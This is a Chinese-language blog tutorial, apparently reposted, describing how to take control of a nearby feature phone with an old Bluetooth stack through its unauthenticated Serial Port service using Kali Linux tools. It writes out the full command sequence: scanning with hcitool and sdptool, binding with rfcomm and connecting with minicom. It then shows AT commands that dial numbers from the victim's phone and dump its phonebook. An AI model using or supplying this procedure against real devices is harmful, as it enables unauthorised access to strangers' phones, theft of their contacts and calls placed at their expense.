[Kali_BT]通过低版本SerialPort蓝牙渗透功能手机

 
方法并非原创,均来自互联网,这里只是记录下笔者自己的操作过程,大神无视之~
 
平台:kali_linux             #因为kali自带很对安全审计工具,无需单独一个一个安装
目标:某品牌功能手机            #蓝牙版本较低,有可利用的漏洞
 
 
准备: 因为攻击平台已经集成很多安全审计工具,这里只需要安装一个软件:minicom
apt-get install minicom
 
ok,开始工作!
1.查看自己主机的蓝牙设备
hciconfig                                #可以看到本机蓝牙设备为hci0
2.加载蓝牙设备
hciconfig hcix up                        #加载本机蓝牙设备hci0
3.搜索周围的蓝牙设备
hcitool -i hcix scan                       #搜索到一功能手机开了蓝牙功能(Fuck Me!)
4.浏览目标设备所有可用服务
sdptool browse mac                    #扫描目标蓝牙的mac
 
  
5.查看到目标蓝牙有“Serial Port0”,这正是这里所要利用的漏洞,这里频道为11;打开/etc/bluetooth/rfcomm.conf,去掉下面段的注释符,并修改device和channel与目标主机相同;保存退出!
 
6.与目标蓝牙设备建立映射:
rfcomm bind /dev/rfcomm0
 
7.配置minicom:
 输入minicom -m -s进入setup模式;
选择Serial port setup:
 
设置Serial Device 为/dev/rfcomm0                       #这里与前面的映射设备相同
 
Save setup as dfl              #回车保存
Exit from Minicom               #退出
 
8.开始控制目标手机:
输入minicom -m             #开始控制目标手机,此时目标手机会出现一个“串口已连接”的窗口一闪而过!
 
在该窗口输入atdt xxxxx(电话号码)                              #拨打电话
输入at+cpbr=1,80                            #显示目标手机电话簿,这里1为从第一个开始显示,80为到第80个结束显示


更多功能按alt+z键! 
 
 
总结:
通常好的手机段都有认证机制,故链接串口会弹出允许连接框,所以很难做到,无后台链接,不推荐使用以上方法。

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。